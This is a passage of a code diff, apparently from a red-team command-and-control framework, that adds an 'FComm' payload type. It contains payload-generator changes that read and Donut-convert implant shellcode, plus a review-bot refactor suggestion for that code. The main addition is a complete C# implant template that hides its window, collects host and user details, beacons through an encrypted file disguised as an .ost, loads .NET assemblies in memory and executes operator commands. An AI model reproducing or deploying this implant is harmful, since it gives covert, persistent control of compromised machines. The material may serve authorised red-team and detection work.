+ elif payloadtype == PayloadType.FCommSharp:
+ with open("%s%s" % (self.BaseDirectory, name + "FCommSharp_v4_x86_Shellcode.bin"), "rb") as f:
+ x86base64 = f.read()
+ with open("%s%s" % (self.BaseDirectory, name + "FCommSharp_v4_x64_Shellcode.bin"), "rb") as f:
+ x64base64 = f.read()
 x86base64 = base64.b64encode(x86base64)
 x64base64 = base64.b64encode(x64base64)
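Review bot: The new `PayloadType.FCommSharp` branch in CreateEXEFiles() is the third copy of the same eight lines (open the x86 .bin, hex-encode, formStr, repeat for x64), differing from the Sharp and PBindSharp branches only in the file-name prefix, and the x86/x64 read pairs added to CreateMsbuildFiles() here and CreateCSCFiles() in the next hunk repeat the same shape. A small helper that turns a shellcode basename into the C literal collapses each branch to two lines and makes the next payload type a one-line addition; the `# Get the Sharp shellcode` comment copied into the FComm branch is also now inaccurate and would go away with it. CreateEXEFiles() starts and ends outside the hunk.
```python
    def _read_shellcode_as_c(self, basename):
        """Return {BaseDirectory}{basename}_Shellcode.bin as a C `char sc[]` literal."""
        with open(f"{self.BaseDirectory}{basename}_Shellcode.bin", "rb") as f:
            hexcode = "".join("\\x{:02x}".format(c) for c in f.read())
        return formStr("char sc[]", hexcode)

    # … unchanged: CreateEXEFiles up to the payloadtype dispatch …
        elif payloadtype == PayloadType.FCommSharp:
            shellcode32 = self._read_shellcode_as_c(f"{name}FCommSharp_v4_x86")
            shellcode64 = self._read_shellcode_as_c(f"{name}FCommSharp_v4_x64")
```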
@@ -585,6 +628,11 @@ def CreateCSCFiles(self, payloadtype, name=""):
 x86base64 = f.read()
 with open("%s%s" % (self.BaseDirectory, name + "PBindSharp_v4_x64_Shellcode.bin"), "rb") as f:
 x64base64 = f.read()
+ elif payloadtype == PayloadType.FCommSharp:
+ with open("%s%s" % (self.BaseDirectory, name + "FCommSharp_v4_x86_Shellcode.bin"), "rb") as f:
+ x86base64 = f.read()
+ with open("%s%s" % (self.BaseDirectory, name + "FCommSharp_v4_x64_Shellcode.bin"), "rb") as f:
+ x64base64 = f.read()
 x86base64 = base64.b64encode(x86base64)
 x64base64 = base64.b64encode(x64base64)
@@ -621,6 +669,8 @@ def CreateDonutShellcodeFile(self, payloadtype, name=""):
 sourcefile = "dropper_cs.exe"
 elif payloadtype == PayloadType.PBindSharp:
 sourcefile = "pbind_cs.exe"
+ elif payloadtype == PayloadType.FCommSharp:
+ sourcefile = "fcomm_cs.exe"
 shellcode32 = donut.create(file=f"{self.BaseDirectory}{name}{sourcefile}", arch=1)
 if shellcode32:
diff --git a/resources/config-template.yml b/resources/config-template.yml
index f84b1fb6..4854e86f 100644
--- a/resources/config-template.yml
+++ b/resources/config-template.yml
@@ -48,3 +48,6 @@ SocksHost: "http://127.0.0.1:49031"
 # PBind Options
 PBindPipeName: "jaccdpqnvbrrxlaf"
 PBindSecret: "mtkn4"
+
+# FComm Options
+FCommFileName: "C:\\Users\\Public\\Public.ost"
\ No newline at end of file
diff --git a/resources/modules/FComm.exe b/resources/modules/FComm.exe
new file mode 100644
index 00000000..a104cf58
Binary files /dev/null and b/resources/modules/FComm.exe differ
diff --git a/resources/payload-templates/fcomm.cs b/resources/payload-templates/fcomm.cs
new file mode 100755
index 00000000..bff9ded9
--- /dev/null
+++ b/resources/payload-templates/fcomm.cs
@@ -0,0 +1,593 @@ +using System; +using System.Diagnostics; +using System.IO; +using System.IO.Compression; +using System.Linq; +using System.Reflection; +using System.Runtime.InteropServices; +using System.Security; +using System.Security.Cryptography; +using System.Security.Principal; +using System.Text; +using System.Text.RegularExpressions; +using System.Threading; + + +public class Program +{ + public static string input; + public static bool kill; + public static string filename; + public static string encryption; + public static string output; + public static bool running; + public static bool initialised; + public static FCClient FComm; + private static StringWriter backgroundTaskOutput = new StringWriter(); + [DllImport("kernel32.dll")] + static extern IntPtr GetConsoleWindow(); + [DllImport("user32.dll")] + static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); + public const int SW_HIDEN = 0; + public const int SW_SHOW = 5; + + + public static void Sharp() + { + var handle = GetConsoleWindow(); + ShowWindow(handle, SW_HIDEN); + Program.filename = @"#REPLACEFCOMMFILENAME#"; + Program.encryption = @"#REPLACEKEY#"; + Program.kill = false; + FCommConnect(); + + } + + public static void Main() + { + Sharp(); + } + + static bool ihInteg() + { + System.Security.Principal.WindowsIdentity identity = System.Security.Principal.WindowsIdentity.GetCurrent(); + System.Security.Principal.WindowsPrincipal principal = new System.Security.Principal.WindowsPrincipal(identity); + return principal.IsInRole(System.Security.Principal.WindowsBuiltInRole.Administrator); + } + + private static void FCommConnect() + { + //initialise the implant. 
+ + if (initialised == false) + { + string u = ""; + try + { + u = WindowsIdentity.GetCurrent().Name; + } + catch + { + u = Environment.UserName; + } + if (ihInteg()) { + u += "*"; + } + string dn = Environment.UserDomainName; + string cn = Environment.GetEnvironmentVariable("COMPUTERNAME"); + string arch = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE"); + int pid = Process.GetCurrentProcess().Id; + Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir"); + string hostinfo = String.Format("FComm-Connected: {0};{1};{2};{3};{4};", dn, u, cn, arch, pid); + FComm = new FCClient(filename, hostinfo, encryption); + initialised = true; + + } + + try + { + running = true; + while (running) + { + if (initialised == true) + { + var output = new StringBuilder(); + + //DANGER: Removing this could end up absolutely spanking the CPU, this is effectively Beacon Time for the implant. + Thread.Sleep(5000); //fixed beacon time. + + FCDataGram Task = FComm.GetCurrentTasking(); + if (Task == null) + { + //Nothing to do. + continue; + } + + if (Task.Actioned == true) + { + //The task in the file has been actioned already. + continue; + } + + var cmd = Task.Input; + var sOutput2 = new StringWriter(); //Setup stringwriter to buffer output from command. + if (cmd.ToLower().StartsWith("kill-implant")) + { + running = false; + initialised = false; + sOutput2.WriteLine("[!] Killed Implant."); + FComm.CleanUp(); + FComm = null; + } + else if (cmd.ToLower().StartsWith("loadmodule")) + { + try + { + var module = Regex.Replace(cmd, "loadmodule", "", RegexOptions.IgnoreCase); + var assembly = Assembly.Load(Convert.FromBase64String(module)); + } + catch (Exception e) { sOutput2.WriteLine($"Error loading modules {e}"); } + sOutput2.WriteLine("Module loaded successfully"); + } + else if (cmd.ToLower().StartsWith("run-dll-background") || cmd.ToLower().StartsWith("run-exe-background")) + { + sOutput2.WriteLine("[!] 
This is not implemented yet in FComm implant types."); + //This might not work!? Need to consider how to approach this. + /* + Thread t = new Thread(() => RunAssembly(cmd, true)); + t.Start(); + sOutput2.WriteLine("[+] Running task in background, run get-bg to get background output."); + sOutput2.WriteLine("[*] Only run one task in the background at a time per implant."); + */ + } + else if (cmd.ToLower().StartsWith("run-dll") || cmd.ToLower().StartsWith("run-exe")) + { + var oldOutput = Console.Out; //redirecting output + Console.SetOut(sOutput2); + sOutput2.WriteLine(RunAssembly((cmd))); + Console.SetOut(oldOutput); //redirecting it back. + } + else if (cmd.ToLower() == "foo") + { + sOutput2.WriteLine("bar"); + } + else if (cmd.ToLower() == "get-bg") + { + //Removing this as Rob says this should just work, but it's not been properly tested yet. + sOutput2.WriteLine("[!] This is not implemented yet in FComm implant types."); + /* + var backgroundTaskOutputString = backgroundTaskOutput.ToString(); + if (!string.IsNullOrEmpty(backgroundTaskOutputString)) + { + output.Append(backgroundTaskOutputString); //check later. 
+ }
+ else
+ {
+ sOutput2.WriteLine("[-] No output");
+ }*/
+ }
+ else
+ {
+ var oldOutput = Console.Out;
+ Console.SetOut(sOutput2);
+ sOutput2.WriteLine(RunAssembly($"run-exe Core.Program Core {cmd}"));
+ Console.SetOut(oldOutput);
+ }
+
+ output.Append(sOutput2.ToString());
+ Task.Output = Convert.ToBase64String(Encoding.UTF8.GetBytes(output.ToString()));
+ Task.Actioned = true;
+ FComm.UpdateTask(Task);
+ output.Clear();
+ output.Length = 0;
+ sOutput2.Flush();
+ sOutput2.Close();
+
+ }
+ }
+ }
+
+ catch (Exception e)
+ {
+ Console.WriteLine("Error: " + e.Message);
+ Console.WriteLine(e.StackTrace);
+ }
+ }
+
+ [DllImport("shell32.dll")] static extern IntPtr CommandLineToArgvW([MarshalAs(UnmanagedType.LPWStr)] string lpCmdLine, out int pNumArgs);
+ private static string[] ParseCommandLineArgs(string cl)
+ {
+ int argc;
+ var argv = CommandLineToArgvW(cl, out argc);
+ if (argv == IntPtr.Zero)
+ throw new System.ComponentModel.Win32Exception();
+ try
+ {
+ var args = new string[argc];
+ for (var i = 0; i < args.Length; i++)
+ {
+ var p = Marshal.ReadIntPtr(argv, i * IntPtr.Size);
+ args[i] = Marshal.PtrToStringUni(p);
+ }
+
+ return args;
+ }
+ finally
+ {
+ Marshal.FreeHGlobal(argv);
+ }
+ }
+
+ private static Type LoadAssembly(string assemblyName)
+ {
+ return Type.GetType(assemblyName, (name) =>
+ {
+ return AppDomain.CurrentDomain.GetAssemblies().Where(z => z.FullName == name.FullName).LastOrDefault();
+ }, null, true);
+ }
+
+ private static string RunAssembly(string c, bool background = false)
+ {
+
+ var oldOutput = Console.Out;
+ if (background)
+ {
+ backgroundTaskOutput = new StringWriter();
+ Console.SetOut(backgroundTaskOutput);
+ }
+ var splitargs = c.Split(new string[] { " " }, StringSplitOptions.RemoveEmptyEntries);
+ int i = 0;
+ var sOut = "";
+ string sMethod = "", sta = "", qNme = "", name = "";
+ foreach (var a in splitargs)
+ {
+ if (i == 1)
+ qNme = a;
+ if (i == 2)
+ name = a;
+ if (c.ToLower().StartsWith("run-exe"))
+ {
+ if (i > 2)
+ sta = sta + " " + a;
+ }
+ else
+ {
+ if (i == 3)
+ sMethod = a;
+ else if (i > 3)
+ sta = sta + " " + a;
+ }
+ i++;
+ }
+ string[] l = ParseCommandLineArgs(sta);
+ var asArgs = l.Skip(1).ToArray();
+ foreach (var Ass in AppDomain.CurrentDomain.GetAssemblies())
+ {
+ if (Ass.FullName.ToString().ToLower().StartsWith(name.ToLower()))
+ {
+ var lTyp = LoadAssembly(qNme + ", " + Ass.FullName);
+ try
+ {
+ if (c.ToLower().StartsWith("run-exe"))
+ {
+ object output = null;
+ output = lTyp.Assembly.EntryPoint.Invoke(null, new object[] { asArgs });
+ if (output != null)
+ {
+ sOut = output.ToString();
+ }
+ }
+ else
+ {
+ try
+ {
+ object output = null;
+ output = lTyp.Assembly.GetType(qNme).InvokeMember(sMethod, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, asArgs).ToString();
+ if (output != null)
+ {
+ sOut = output.ToString();
+ }
+ }
+ catch
+ {
+ object output = null;
+ output = lTyp.Assembly.GetType(qNme).InvokeMember(sMethod, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, null).ToString();
+ if (output != null)
+ {
+ sOut = output.ToString();
+ }
+ }
+ }
+ }
+ catch (Exception e)
+ {
+ Console.WriteLine("RAsm Exception: " + e.Message);
+ Console.WriteLine(e.StackTrace);
+ }
+ break;
+ }
+ }
+ if (background)
+ {
+ Console.SetOut(oldOutput);
+ backgroundTaskOutput.WriteLine(sOut);
+ }
+ return sOut;
+ }
+
+
+}
+
+
+public class FCDataGram
+{
+ public string PacketType { get; set; }
+ public string Input { get; set; }
+ public string Output { get; set; }
+ public bool Actioned { get; set; }
+ public bool Retrieved { get; set; }
+
+ public FCDataGram()
+ {
+ Actioned = false;
+ Retrieved = false;
+ }
+
+ public FCDataGram(string[] objContents)
+ {
+ PacketType = objContents[0];
+ Input = objContents[1];
+ Output = objContents[2];
+ Actioned = bool.Parse(objContents[3]);
+ Retrieved = bool.Parse(objContents[4]);
+ }
+
+ public FCDataGram(string objContents)
+ {
+ char[] delim = { ',' };
+ FromStringArray(objContents.Split(delim));
+ }
+
+ public override string ToString()
+ {
+ return string.Join(",", ToStringArray());
+ }
+
+ public string[] ToStringArray()
+ {
+ return new string[] { PacketType, Input, Output, Actioned.ToString(), Retrieved.ToString() };
+ }
+
+ public void FromStringArray(string[] objContents)
+ {
+ PacketType = objContents[0];
+ Input = objContents[1];
+ Output = objContents[2];
+ Actioned = bool.Parse(objContents[3]);
+ Retrieved = bool.Parse(objContents[4]);
+ }
+}
+
+public class FCClient
+{
+ //Client is the far end of this connection.
+ private string FilePath;
+ private string Key;
+ public FCClient(string FilePath_In, string HostInfo, string key)
+ {
+ //initialise object.
+ try
+ {
+ FilePath = FilePath_In;
+ Key = key;
+ string path = Path.GetDirectoryName(FilePath_In);
+ string filename = Path.GetFileName(FilePath_In);
+ Directory.CreateDirectory(path); //Create the full path if it doesn't exist.
+ var f = File.Create(FilePath_In); //create the file if it doesn't exist. Probably worth putting more sanity checks here.
+ f.Close();
+ f.Dispose();
+ //lets populate it with the info we need.
+ FCDataGram InitialContent = new FCDataGram() { PacketType = "INIT", Input = "initial", Output = Convert.ToBase64String(Encoding.UTF8.GetBytes(HostInfo)), Actioned = true };
+ SendData(InitialContent);
+ }
+ catch (SecurityException e)
+ {
+ Console.WriteLine(e.Message);
+ }
+ catch (Exception e)
+ {
+ Console.WriteLine(e.Message);
+ }
+ }
+
+ public void Tasking(string input)
+ {
+ FCDataGram Task = new FCDataGram() { PacketType = "TASK", Input = input, Output = "", Actioned = false };
+
+ }
+
+ public FCDataGram GetCurrentTasking() {
+ //Just to make the methods seem sensible.
+ return GetData();
+ }
+ public void UpdateTask(FCDataGram Task) {
+ //Just to make the methods seem sensible.
+ SendData(Task);
+ }
+
+ private void SafeFileWrite(string data)
+ {
+ //Guaranteed File Write.
+ FileStream f = null;
+ while (f == null)
+ {
+ try
+ {
+ f = new FileStream(FilePath, FileMode.Create, FileAccess.Write);
+ StreamWriter sr = new StreamWriter(f);
+ sr.WriteLine(data);
+ sr.Close();
+ f.Close();
+ sr.Dispose();
+ f.Dispose();
+ }
+ catch (IOException)
+ {
+ Thread.Sleep(200); // small sleep to wait before we loop to try again. Probably worth having an attempts limit, but could also massively break everything. Need to think about it.
+ }
+ }
+ }
+ private string SafeFileRead()
+ {
+ string StrTask = "";
+ int counter = 0;
+ FileStream f = null;
+ while (f == null)
+ {
+ try
+ {
+ f = new FileStream(FilePath, FileMode.Open, FileAccess.Read);
+ StreamReader sr = new StreamReader(f);
+ string line;
+ while ((line = sr.ReadLine()) != null)
+ {
+ if (counter > 1)
+ {
+ throw new Exception();
+ }
+ //This should only happen once. Should. SHOULD. but it wont. so above it'll throw an exception.
+ StrTask = (line);
+ counter++;
+ }
+ sr.Close();
+ f.Close();
+ sr.Dispose();
+ f.Dispose();
+ }
+ catch (IOException)
+ {
+ Thread.Sleep(500); // As above, small sleep to wait before we loop to try again. Probably need to do this more gracefully but not sure how to just yet.
+ }
+ }
+ return StrTask;
+ }
+
+ private void SendData(FCDataGram DataToSend)
+ {
+ //Turn object into a string.
+ //encrypt it
+ //write it.
+ SafeFileWrite(Encrypt(Key, DataToSend.ToString()));
+ }
+
+ private FCDataGram GetData()
+ {
+ //Get the contents of the file.
+ //Decrypt it
+ //Create a DataGram.
+ return new FCDataGram(Decrypt(Key, SafeFileRead()));
+ }
+
+ public void CleanUp()
+ {
+ //maybe utilise POSH SHRED here?
+ File.Delete(FilePath);
+ }
+ private static string Decrypt(string key, string ciphertext)
+ {
+ var rawCipherText = Convert.FromBase64String(ciphertext);
+ var IV = new Byte[16];
+ Array.Copy(rawCipherText, IV, 16);
+ try
+ {
+ var algorithm = CreateEncryptionAlgorithm(key, Convert.ToBase64String(IV));
+ var decrypted = algorithm.CreateDecryptor().TransformFinalBlock(rawCipherText, 16, rawCipherText.Length - 16);
+ //return decrypted;
+ //return decrypted.Where(x => x > 0).ToArray();
+ return Encoding.UTF8.GetString(decrypted.Where(x => x > 0).ToArray());
+ }
+ catch
+ {
+ var algorithm = CreateEncryptionAlgorithm(key, Convert.ToBase64String(IV), false);
+ var decrypted = algorithm.CreateDecryptor().TransformFinalBlock(rawCipherText, 16, rawCipherText.Length - 16);
+ //return decrypted;
+ return Encoding.UTF8.GetString(decrypted.Where(x => x > 0).ToArray());
+ //return decrypted.Where(x => x > 0).ToArray();
+ }
+ finally
+ {
+ Array.Clear(rawCipherText, 0, rawCipherText.Length);
+ Array.Clear(IV, 0, 16);
+ }
+
+ }
+
+ private static string Encrypt(string key, string un, bool comp = false, byte[] unByte = null)
+ {
+ byte[] byEnc;
+ if (unByte != null)
+ byEnc = unByte;
+ else
+ byEnc = Encoding.UTF8.GetBytes(un);
+
+ if (comp)
+ byEnc = GzipCompress(byEnc);
+
+ try
+ {
+ var a = CreateEncryptionAlgorithm(key, null);
+ var f = a.CreateEncryptor().TransformFinalBlock(byEnc, 0, byEnc.Length);
+ return Convert.ToBase64String(CombineArrays(a.IV, f));
+ }
+ catch
+ {
+ var a = CreateEncryptionAlgorithm(key, null, false);
+ var f = a.CreateEncryptor().TransformFinalBlock(byEnc, 0, byEnc.Length);
+ return Convert.ToBase64String(CombineArrays(a.IV, f));
+ }
+ }
+
+ private static SymmetricAlgorithm CreateEncryptionAlgorithm(string key, string IV, bool rij = true)
+ {
+ SymmetricAlgorithm algorithm;
+ if (rij)
+ algorithm = new RijndaelManaged();
+ else
+ algorithm = new AesCryptoServiceProvider();
+
+ algorithm.Mode = CipherMode.CBC;
+ algorithm.Padding = PaddingMode.Zeros;
+ algorithm.BlockSize = 128;
+ algorithm.KeySize = 256;
+
+ if (null != IV)
+ algorithm.IV = Convert.FromBase64String(IV);
+ else
+ algorithm.GenerateIV();
+
+ if (null != key)
+ algorithm.Key = Convert.FromBase64String(key);
+
+ return algorithm;
+ }
+
+ private static byte[] GzipCompress(byte[] raw)
+ {
+ using (MemoryStream memory = new MemoryStream())
+ {
+ using (GZipStream gzip = new GZipStream(memory, CompressionMode.Compress, true))
+ {
+ gzip.Write(raw, 0, raw.Length);
+ }
+ return memory.ToArray();
+ }
+ }
+
+ private static byte[] CombineArrays(byte[] first, byte[] second)
+ {
+ byte[] ret = new byte[first.Length + second.Length];
+ Buffer.BlockCopy(first, 0, ret, 0, first.Length);
+ Buffer.BlockCopy(second, 0, ret, first.Length, second.Length);
+ return ret;
+ }
+}